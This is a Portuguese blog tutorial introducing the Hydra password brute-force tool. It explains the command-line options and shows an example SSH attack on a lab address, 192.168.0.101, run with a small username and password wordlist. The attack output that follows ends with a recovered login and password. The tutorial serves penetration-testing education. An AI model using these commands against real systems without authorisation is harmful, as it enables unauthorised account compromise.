Introdução ao Hydra – Brute Force

Introdução ao Hydra – Brute Force

Basicamente o Hydra descobre senha através de Brute Force (tentativa e erro), ele busca em wordlists possíveis usuários/senhas e vai testando as combinações, uma a uma. O Hydra tem suporte aos serviços Telnet, Formulário HTTP/HTTPS, SSH, MySQL, PostgreSQL, MSSQL, SMB, LDAP2 e LDAP3, FTP, SNMP, CVS,VNC, entre outros. 

A ferramenta já vem toda instalada e configurada (inclusive com interface gráfica) no Back Track, porém caso não tenha instalado, basta fazer o download do código-fonte e compilá-la em qualquer distribuição. 
Abaixo segue alguns parâmetros:
-R Restaura sessões abordadas/quebradas.
-S Conexão segura usando SSL caso seja necessário.
-s Especifica qual porta o hydra vai estabelecer a conexão.
Sintaxe:
# hydra –l username –p password –t threads IP protocol
# hydra -L lista -P lista -t threads IP protocol
Explicação:
-l nome/login da vitima.
-L Carrega uma lista contendo nomes/logins de vitimas. (1 por linha)
-p Especifica senha única.
-P Carrega uma lista com senhas.(1 por linha)
-e ns adcional ‘n’ testa senha em branco || adicional ‘s’ testa user como pass.
-C Usado para carregar um arquivo contendo usuário:senha. formato usuário:senha
equivale a -L/-P.
-M Carrega lista de servidores alvos.(1 por linha)
-o Salva as senhas encontradas dentro do arquivo que você especificar.
-f Faz o programa parar de trabalhar quando a senha||usuário for encontrada[o].
-t Limita o numero de solicitações por vez.(default: 16)
-w Define o tempo máximo em segundos para esperar resposta do serv.(default: 30s)
-v / -V Modo verbose do programa. ‘V’ mostra todas tentativas.
Abaixo segue um exemplo com o protocolo SSH:
[code type=”Exemplo”]hydra –L /tmp/wordlist.txt -P /tmp/wordlist.txt 192.168.0.101 ssh[/code]
Ele irá efetuar um bruteforce com usuários presentes na lista e com as senhas presentes na lista wordlist.txt no servidor cuja IP é 192.168.0.101.
Bom, abaixo segue um “cat” de um “wordlist.txt”:
[code type=”Exemplo do cat”]root@bt:/tmp# cat wordlist.txt
sempreupdate
hugo
diogo
danilo
paula
rosi
1234
mudar1234
P@ssw0rd
coracao
teste
teste123
root
root123
tux123
123tux[/code]

Saída do Hydra:
[code type=”Exemplo saída do hydra”]root@bt:/tmp# hydra -L /tmp/wordlist.txt -P /tmp/wordlist.txt 192.168.0.101 ssh
Hydra v6.5 (c) 2011 by van Hauser / THC and David Maciejak – use allowed only for legal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2012-09-03 15:17:16
WARNING: Restorefile (./hydra.restore) from a previous session found, to prevent overwriting, you have 10 seconds to abort…
[DATA] 16 tasks, 1 servers, 256 login tries (l:16/p:16), ~16 tries per task
[DATA] attacking service ssh on port 22
Warning: Timeout from child 0, restarting
Warning: Timeout from child 1, restarting
Warning: Timeout from child 2, restarting
Warning: Timeout from child 3, restarting
Warning: Timeout from child 4, restarting
Warning: Timeout from child 5, restarting
Warning: Timeout from child 6, restarting
Warning: Timeout from child 7, restarting
Warning: Timeout from child 8, restarting
Warning: Timeout from child 9, restarting
Warning: Timeout from child 10, restarting
Warning: Timeout from child 11, restarting
Warning: Timeout from child 12, restarting
Warning: Timeout from child 13, restarting
Warning: Timeout from child 14, restarting
Warning: Timeout from child 15, restarting
Warning: Timeout from child 0, restarting
Warning: Timeout from child 1, restarting
Warning: Timeout from child 2, restarting
Warning: Timeout from child 3, restarting
Warning: Timeout from child 4, restarting
Warning: Timeout from child 5, restarting
Warning: Timeout from child 6, restarting
Warning: Timeout from child 7, restarting
Warning: Timeout from child 8, restarting
Warning: Timeout from child 9, restarting
Warning: Timeout from child 10, restarting
Warning: Timeout from child 11, restarting
Warning: Timeout from child 12, restarting
Warning: Timeout from child 13, restarting
Warning: Timeout from child 14, restarting
Warning: Timeout from child 15, restarting
Warning: Timeout from child 0, restarting
Warning: Timeout from child 1, restarting
Warning: Timeout from child 2, restarting
Warning: Timeout from child 3, restarting
Warning: Timeout from child 4, restarting
Warning: Timeout from child 5, restarting
Warning: Timeout from child 6, restarting
Warning: Timeout from child 7, restarting
Warning: Timeout from child 8, restarting
Warning: Timeout from child 9, restarting
Warning: Timeout from child 10, restarting
Warning: Timeout from child 11, restarting
Warning: Timeout from child 12, restarting
Warning: Timeout from child 13, restarting
Warning: Timeout from child 14, restarting
Warning: Timeout from child 15, restarting
[22][ssh] host: 192.168.0.101 login: sempreupdate password: tux123 //AQUI ESTÁ!
Warning: Timeout from child 0, restarting
Warning: Timeout from child 1, restarting
Warning: Timeout from child 2, restarting
Warning: Timeout from child 3, restarting
Warning: Timeout from child 4, restarting
Warning: Timeout from child 5, restarting
Warning: Timeout from child 6, restarting
Warning: Timeout from child 7, restarting
Warning: Timeout from child 8, restarting
Warning: Timeout from child 9, restarting
Warning: Timeout from child 10, restarting
Warning: Timeout from child 11, restarting
Warning: Timeout from child 12, restarting
Warning: Timeout from child 13, restarting
Warning: Timeout from child 14, restarting
Warning: Timeout from child 15, restarting
Warning: Timeout from child 0, restarting
Warning: Timeout from child 1, restarting
Warning: Timeout from child 2, restarting
Warning: Timeout from child 3, restarting
Warning: Timeout from child 4, restarting
Warning: Timeout from child 5, restarting
Warning: Timeout from child 6, restarting
Warning: Timeout from child 7, restarting
Warning: Timeout from child 8, restarting
Warning: Timeout from child 9, restarting
Warning: Timeout from child 10, restarting
Warning: Timeout from child 11, restarting
Warning: Timeout from child 12, restarting
Warning: Timeout from child 13, restarting
Warning: Timeout from child 14, restarting
Warning: Timeout from child 15, restarting
Warning: Timeout from child 0, restarting
Warning: Timeout from child 1, restarting
Warning: Timeout from child 2, restarting
Warning: Timeout from child 3, restarting
Warning: Timeout from child 4, restarting
Warning: Timeout from child 5, restarting
Warning: Timeout from child 6, restarting
Warning: Timeout from child 7, restarting
Warning: Timeout from child 8, restarting
Warning: Timeout from child 9, restarting
Warning: Timeout from child 10, restarting
Warning: Timeout from child 11, restarting
Warning: Timeout from child 12, restarting
Warning: Timeout from child 13, restarting
Warning: Timeout from child 14, restarting
Warning: Timeout from child 15, restarting[/code]
Repare que ele testa várias combinações e retorna “Timeout” quando não consegue fechar a autenticação. Porém quando consegue ele retorna :
[porta][protocolo]           host: IP             login: “login correto” password: “senha correta”
  [22]       [ssh]       host: 192.168.0.101   login: sempreupdate   password: tux123   
Bom, essa foi apenas um introdução. 
Um abraço a todos.
[ads-post]

você pode gostar também Mais do autor

Comentários